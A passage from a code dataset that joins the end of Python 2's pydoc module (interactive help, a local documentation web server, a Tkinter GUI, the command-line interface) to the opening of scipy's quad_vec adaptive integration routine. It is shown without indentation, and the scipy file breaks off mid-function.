"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
# Ignore non-ImportError exceptions raised whilst trying to
# import modules
pass
try: import warnings
except ImportError: pass
else: warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <[email protected]></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
| apache-2.0 |
tylerjereddy/scipy | scipy/integrate/_quad_vec.py | 12 | 20691 | import sys
import copy
import heapq
import collections
import functools
import numpy as np
from scipy._lib._util import MapWrapper
class LRUDict(collections.OrderedDict):
def __init__(self, max_size):
self.__max_size = max_size
def __setitem__(self, key, value):
existing_key = (key in self)
super().__setitem__(key, value)
if existing_key:
self.move_to_end(key)
elif len(self) > self.__max_size:
self.popitem(last=False)
def update(self, other):
# Not needed below
raise NotImplementedError()
class SemiInfiniteFunc:
"""
Argument transform from (start, +-oo) to (0, 1)
"""
def __init__(self, func, start, infty):
self._func = func
self._start = start
self._sgn = -1 if infty < 0 else 1
# Overflow threshold for the 1/t**2 factor
self._tmin = sys.float_info.min**0.5
def get_t(self, x):
z = self._sgn * (x - self._start) + 1
if z == 0:
# Can happen only if point not in range
return np.inf
return 1 / z
def __call__(self, t):
if t < self._tmin:
return 0.0
else:
x = self._start + self._sgn * (1 - t) / t
f = self._func(x)
return self._sgn * (f / t) / t
class DoubleInfiniteFunc:
"""
Argument transform from (-oo, oo) to (-1, 1)
"""
def __init__(self, func):
self._func = func
# Overflow threshold for the 1/t**2 factor
self._tmin = sys.float_info.min**0.5
def get_t(self, x):
s = -1 if x < 0 else 1
return s / (abs(x) + 1)
def __call__(self, t):
if abs(t) < self._tmin:
return 0.0
else:
x = (1 - abs(t)) / t
f = self._func(x)
return (f / t) / t
def _max_norm(x):
return np.amax(abs(x))
def _get_sizeof(obj):
try:
return sys.getsizeof(obj)
except TypeError:
# occurs on pypy
if hasattr(obj, '__sizeof__'):
return int(obj.__sizeof__())
return 64
class _Bunch:
def __init__(self, **kwargs):
self.__keys = kwargs.keys()
self.__dict__.update(**kwargs)
def __repr__(self):
return "_Bunch({})".format(", ".join("{}={}".format(k, repr(self.__dict__[k]))
for k in self.__keys))
def quad_vec(f, a, b, epsabs=1e-200, epsrel=1e-8, norm='2', cache_size=100e6, limit=10000,
workers=1, points=None, quadrature=None, full_output=False):
r"""Adaptive integration of a vector-valued function.
Parameters
----------
f : callable
Vector-valued function f(x) to integrate.
a : float
Initial point.
b : float
Final point.
epsabs : float, optional
Absolute tolerance.
epsrel : float, optional
Relative tolerance.
norm : {'max', '2'}, optional
Vector norm to use for error estimation.
cache_size : int, optional
Number of bytes to use for memoization.
workers : int or map-like callable, optional
If `workers` is an integer, part of the computation is done in
parallel subdivided to this many tasks (using
:class:`python:multiprocessing.pool.Pool`).
Supply `-1` to use all cores available to the Process.
Alternatively, supply a map-like callable, such as
:meth:`python:multiprocessing.pool.Pool.map` for evaluating the
population in parallel.
This evaluation is carried out as ``workers(func, iterable)``.
points : list, optional
List of additional breakpoints.
quadrature : {'gk21', 'gk15', 'trapezoid'}, optional
Quadrature rule to use on subintervals.
Options: 'gk21' (Gauss-Kronrod 21-point rule),
'gk15' (Gauss-Kronrod 15-point rule),
'trapezoid' (composite trapezoid rule).
Default: 'gk21' for finite intervals and 'gk15' for (semi-)infinite
full_output : bool, optional
Return an additional ``info`` dictionary.
Returns
-------
res : {float, array-like}
Estimate for the result
err : float
Error estimate for the result in the given norm
info : dict
Returned only when ``full_output=True``.
Info dictionary. Is an object with the attributes:
success : bool
Whether integration reached target precision.
status : int
Indicator for convergence, success (0),
failure (1), and failure due to rounding error (2).
neval : int
Number of function evaluations.
intervals : ndarray, shape (num_intervals, 2)
Start and end points of subdivision intervals.
integrals : ndarray, shape (num_intervals, ...)
Integral for each interval.
Note that at most ``cache_size`` values are recorded,
and the array may contains *nan* for missing items.
errors : ndarray, shape (num_intervals,)
Estimated integration error for each interval.
Notes
-----
The algorithm mainly follows the implementation of QUADPACK's
DQAG* algorithms, implementing global error control and adaptive
subdivision.
The algorithm here has some differences to the QUADPACK approach:
Instead of subdividing one interval at a time, the algorithm
subdivides N intervals with largest errors at once. This enables
(partial) parallelization of the integration.
The logic of subdividing "next largest" intervals first is then
not implemented, and we rely on the above extension to avoid
concentrating on "small" intervals only.
The Wynn epsilon table extrapolation is not used (QUADPACK uses it
for infinite intervals). This is because the algorithm here is
supposed to work on vector-valued functions, in an user-specified
norm, and the extension of the epsilon algorithm to this case does
not appear to be widely agreed. For max-norm, using elementwise
Wynn epsilon could be possible, but we do not do this here with
the hope that the epsilon extrapolation is mainly useful in
special cases.
References
----------
[1] R. Piessens, E. de Doncker, QUADPACK (1983).
Examples
--------
We can compute integrations of a vector-valued function:
>>> from scipy.integrate import quad_vec
>>> import matplotlib.pyplot as plt
>>> alpha = np.linspace(0.0, 2.0, num=30)
>>> f = lambda x: x**alpha
>>> x0, x1 = 0, 2
>>> y, err = quad_vec(f, x0, x1)
>>> plt.plot(alpha, y)
>>> plt.xlabel(r"$\alpha$")
>>> plt.ylabel(r"$\int_{0}^{2} x^\alpha dx$")
>>> plt.show()
"""
a = float(a)
b = float(b)
# Use simple transformations to deal with integrals over infinite
# intervals.
kwargs = dict(epsabs=epsabs,
epsrel=epsrel,
norm=norm,
cache_size=cache_size,
limit=limit,
workers=workers,
points=points,
quadrature='gk15' if quadrature is None else quadrature,
full_output=full_output)
if np.isfinite(a) and np.isinf(b):
f2 = SemiInfiniteFunc(f, start=a, infty=b)
if points is not None:
kwargs['points'] = tuple(f2.get_t(xp) for xp in points)
